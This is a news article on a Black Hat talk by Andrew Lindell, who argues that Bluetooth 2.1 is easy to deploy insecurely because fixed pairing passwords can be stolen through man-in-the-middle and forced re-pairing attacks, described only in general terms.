It's possible to use 2.1 securely, said Andrew Lindell, chief cryptographer for Aladdin Knowledge Systems Ltd., but the odds are stacked against it.
"Good protocol should be hard to get wrong and easy to get right," Lindell said Wednesday at the Black Hat briefings. "Even the best protocols can be badly implemented; in Bluetooth it is the opposite. Unless you really know what you are doing, it's easy to get wrong."
The problem is that the protocol is wide open if a fixed password is used, and secure if a one-time password (OTP) is employed, so it's useless to an attacker. The framers of version 2.1 intended it to use OTPs, but didn't require their use anywhere in the 1,400-page protocol document.
Lindell said that in Bluetooth 2.1, a fixed password can be stolen in less than a second using a man-in-the-middle attack, regardless of the length of the password. In 2.0, a long password could thwart the attacker.
An attacker doesn't need good fortune to be nearby when a user is pairing two devices. Bluetooth devices can be "tricked" into forcing a re-pairing. An alert user might think this is odd, but Lindell said, most people are used to odd or buggy behavior in their technology, and will simply shrug and re-pair.
Lindell described a second attack, in which an attacker can easily obtain the password of a lost or stolen Bluetooth device.
Although Bluetooth version 2.1 was released more than a year ago, there are almost no implementations. Even if manufacturers are aware of the undocumented OTP requirement, there are barriers to implementation.
Devices like hands-free car kits and Bluetooth mice have no user interface, for example. Even in other cases, manufacturers are likely to be reluctant to require customers to use OTPs as a matter of convenience.
The results could be a Bluetooth keyboard turned into a key logger or a Bluetooth car ear set turned into a listening device, a form of what is known as a "car whisperer."
"Or," joked Lindell, "An attacker could even talk to people over the earpiece and scare them."